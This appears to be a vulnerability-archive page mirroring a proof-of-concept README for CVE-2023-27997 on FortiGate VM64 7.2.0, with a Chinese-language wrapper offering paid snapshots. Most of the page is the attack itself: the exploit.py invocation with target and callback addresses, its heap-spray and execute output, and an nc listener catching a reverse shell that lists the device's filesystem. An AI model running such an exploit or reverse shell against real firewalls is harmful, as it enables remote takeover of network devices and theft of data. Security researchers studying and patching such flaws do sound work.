关联漏洞
介绍
# CVE-2023-27997
FortiGate VM64 7.2.0 is exploitable by this code. (note that the code was written in a very stupid way.)
## Proof of Concept
```
$ python3 exploit.py 192.168.106.142 10443 192.168.106.143 9999
[+] generating shellcode
[+] salt=b'25c2dcf2'
[+] processing hash
[+] finding hash in cache
[-] not in cache
[+] computing
[+] loading
[+] heap spray
[+] execute
```
```
$ nc -lvp 9999
Listening on [0.0.0.0] (family 0, port 9999)
Connection from [192.168.106.142] port 9999 [tcp/*] accepted (family 2, sport 2165)
Welcome to Node.js v12.20.1.
Type ".help" for more information.
> .help
.break Sometimes you get stuck, this gets you out
.clear Alias for .break
.exit Exit the repl
.help Print this help message
.load Load JS from a file into the REPL session
.save Save all evaluated commands in this REPL session to a file
Press ^C to abort current expression, ^D to exit the repl
> fs.readdir("/", (err, files) => {
files.forEach(file => {
console.log(file);
});
});
... ..... ..... ... undefined
> .fgtsum
.fgtsum2
bin
boot
data
data2
dev
etc
fortidev
init
lib
lib64
local
migadmin
node-scripts
proc
root
sbin
sys
tmp
usr
var
>
```
文件快照
[4.0K] /data/pocs/c81f87e605adacfc1ac52d26c08bdfe26fc52929
├── [1.7K] calc_hashes.py
├── [ 10K] exploit.py
├── [1.1K] find.py
├── [1.2K] README.md
├── [3.5K] run-calc-hashes.py
└── [ 988] shellcode.py
0 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。